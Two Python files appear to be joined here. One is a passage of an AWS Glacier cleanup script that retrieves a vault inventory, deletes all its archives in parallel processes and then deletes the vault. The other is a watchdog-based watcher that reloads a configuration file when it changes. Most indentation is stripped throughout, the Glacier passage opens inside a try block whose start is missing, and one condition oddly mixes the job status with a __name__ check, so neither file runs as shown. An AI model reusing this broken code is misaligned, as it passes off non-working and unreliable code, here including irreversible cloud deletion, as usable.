glacier_resource = boto3.resource('glacier')
vault = glacier_resource.Vault(accountId, vaultName)
job = vault.initiate_inventory_retrieval()
retrievalJob = job.id
except:
printException()
sys.exit(1)
logging.info('Job ID : %s', retrievalJob)
# Get job status
job = glacier.describe_job(vaultName=vaultName, jobId=retrievalJob)
logging.info('Job Creation Date: {d}'.format(d=job['CreationDate']))
while job['StatusCode'] == 'InProgress':
    # Jobs are usually ready within 4 hours of the request.
logging.info('Inventory not ready, sleep for 10 mins...')
time.sleep(60*10)
job = glacier.describe_job(vaultName=vaultName, jobId=retrievalJob)
if job['StatusCode'] == 'Succeeded' and __name__ == '__main__':
logging.info('Inventory retrieved, parsing data...')
job_output = glacier.get_job_output(vaultName=vaultName, jobId=job['JobId'])
inventory = json.loads(job_output['body'].read().decode('utf-8'))
archiveList = inventory['ArchiveList']
    logging.info('Removing %s archives... please be patient, this may take some time...', len(archiveList))
archiveParts = split_list(archiveList, numProcess)
jobs = []
for archive in archiveParts:
p = Process(target=process_archive, args=(archive,))
jobs.append(p)
p.start()
for j in jobs:
j.join()
logging.info('Removing vault...')
try:
glacier.delete_vault(
vaultName=vaultName
)
logging.info('Vault removed.')
except:
printException()
        logging.error("We can't remove the vault now. Please wait some time and try again. You can also remove it from the AWS console, now that all archives have been removed.")
else:
logging.info('Vault retrieval failed.')
|
watch.py
|
import os
import threading
import time
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
class CustomHandler(FileSystemEventHandler):
current_event = None
def process(self, event):
        if not event.is_directory:
self.current_event = event
def on_modified(self, event):
self.process(event)
def on_created(self, event):
self.process(event)
def get_event(self):
current_event = self.current_event
self.current_event = None
return current_event
class BaseWatcher(object):
def __init__(self, config_file, v):
self.handler = CustomHandler()
self.config_file = config_file
self.directory = os.path.dirname(os.path.realpath(config_file))
self.v = v
def watch_path(self):
observer = Observer()
observer.schedule(self.handler, self.directory)
observer.start()
try:
while True:
event = self.event
if event is not None and event.src_path == self.config_file:
self.v.read_in_config()
if self.v._on_config_change is not None:
self.v._on_config_change()
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
@property
def event(self):
return self.handler.get_event()
class ThreadWatcher(BaseWatcher):
def __init__(self, config_file, v):
super(ThreadWatcher, self).__init__(config_file, v)
self.t = threading.Thread(target=self.watch_path)
self.t.daemon = True
def start(self):
self.t.start()
def get_watcher(config_file, v):
return ThreadWatcher(config_file, v)
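# Illustrative usage (the config path and the Viper-like object `v` are
# placeholders; `v` is only expected to provide read_in_config() and an
# optional _on_config_change callback, as used in BaseWatcher above):
#
#   watcher = get_watcher('/path/to/config.yaml', v)
#   watcher.start()  # daemon thread polls for change events about once a second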
|